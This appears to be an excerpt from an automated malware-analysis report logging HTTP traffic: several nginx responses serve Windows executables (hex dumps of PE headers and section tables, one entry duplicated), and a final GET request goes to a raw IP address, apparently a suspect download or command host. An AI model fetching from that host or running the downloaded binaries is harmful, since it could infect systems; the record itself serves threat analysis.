Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:07 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:08 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:09 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:09 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:10 GMTContent-Type: application/octet-streamContent-Length: 2046288Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-1f3950"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:19 GMTContent-Type: application/octet-streamContent-Length: 342568Last-Modified: Tue, 03 Sep 2024 12:56:26 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d7077a-53a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 06 05 00 00 20 00 00 00 08 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 05 00 00 08 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 12 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 26 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 18 05 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 60 70 4e 04 37 b5 f5 bb b4 6e 9a 85 9e b0 e8 b4 51 c4 a6 b8 15 8b e1 2e c4 64 e0 65 ed a0 d1 24 5b a4 a2 ea ca 41 89 8e 42 b8 c0 99 c6 87 b4 f1 90 43 15 55 31 af 97 23 bf 5e 10 bb 87 1f f1 1d a1 0e 1e ca 35 7f 8f e3 0d 1c c9 8b 36 69 d8 bf 25 8b cf d8 c3 5e 45 61 39 19 12 5b b7 1e 1e e8 14 a6 84 63 74 ed 83 87 df 0f 71 96 e8 9e 16 5a 97 3b 16 0d 36 02 7a 8f 5b 5e b5 a7 58 c4 82 27 11 2f 96 fb 1a af f5 08 56 48 57 2c 99 9c 77 5d b9 b9 7e 35 d0 cf 22 91 4f cd 78 e4 c8 f2 32 1a 60 08 ae 83 c3 62 c1 8f 32 c4 58 aa 3e 3d 5c 1a 6c 1a 8a f9 b5 89 23 f5 b3 78 04 53 a6 1a 2c c9 7e 19 2c 22 fd 88 ac 7a 9a 3c 17 e9 ca 63 c2 5a e6 1a dc 2e 6d 25 7d 52 d5 e7 f7 a8 16 8e 3f 47 1c 2a 39 a1 58 f7 ac 89 b6 a5 73 24 93 11 d3 98 b1 fb d8 1b 96 1b f1 87 46 f9 4c fb f7 ae 9f 16 40 5c 7b c9 2e 4a bd 96 e2 82 7e 5c cb 54 ab 40 43 cb a0 96 1b 06 3a 11 fe 8a 17 ab 1d 8f e7 71 fe e7 fc 19 0b df 6e b6 f5 13 9a 1e 93 9
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 04 Sep 2024 15:38:19 GMTContent-Type: application/octet-streamContent-Length: 342568Last-Modified: Tue, 03 Sep 2024 12:56:26 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66d7077a-53a28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 07 d7 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 08 05 00 00 0a 00 00 00 00 00 00 7e 26 05 00 00 20 00 00 00 40 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 05 00 00 02 00 00 cd a6 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 26 05 00 57 00 00 00 00 40 05 00 02 06 00 00 00 00 00 00 00 00 00 00 00 14 05 00 28 26 00 00 00 60 05 00 0c 00 00 00 ec 24 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 06 05 00 00 20 00 00 00 08 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 02 06 00 00 00 40 05 00 00 08 00 00 00 0a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 05 00 00 02 00 00 00 12 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 26 05 00 00 00 00 00 48 00 00 00 02 00 05 00 c0 18 05 00 2c 0c 00 00 03 00 02 00 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 60 70 4e 04 37 b5 f5 bb b4 6e 9a 85 9e b0 e8 b4 51 c4 a6 b8 15 8b e1 2e c4 64 e0 65 ed a0 d1 24 5b a4 a2 ea ca 41 89 8e 42 b8 c0 99 c6 87 b4 f1 90 43 15 55 31 af 97 23 bf 5e 10 bb 87 1f f1 1d a1 0e 1e ca 35 7f 8f e3 0d 1c c9 8b 36 69 d8 bf 25 8b cf d8 c3 5e 45 61 39 19 12 5b b7 1e 1e e8 14 a6 84 63 74 ed 83 87 df 0f 71 96 e8 9e 16 5a 97 3b 16 0d 36 02 7a 8f 5b 5e b5 a7 58 c4 82 27 11 2f 96 fb 1a af f5 08 56 48 57 2c 99 9c 77 5d b9 b9 7e 35 d0 cf 22 91 4f cd 78 e4 c8 f2 32 1a 60 08 ae 83 c3 62 c1 8f 32 c4 58 aa 3e 3d 5c 1a 6c 1a 8a f9 b5 89 23 f5 b3 78 04 53 a6 1a 2c c9 7e 19 2c 22 fd 88 ac 7a 9a 3c 17 e9 ca 63 c2 5a e6 1a dc 2e 6d 25 7d 52 d5 e7 f7 a8 16 8e 3f 47 1c 2a 39 a1 58 f7 ac 89 b6 a5 73 24 93 11 d3 98 b1 fb d8 1b 96 1b f1 87 46 f9 4c fb f7 ae 9f 16 40 5c 7b c9 2e 4a bd 96 e2 82 7e 5c cb 54 ab 40 43 cb a0 96 1b 06 3a 11 fe 8a 17 ab 1d 8f e7 71 fe e7 fc 19 0b df 6e b6 f5 13 9a 1e 93 9

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 46.8.231.109Connection: Keep-AliveCache-Control: no-cache
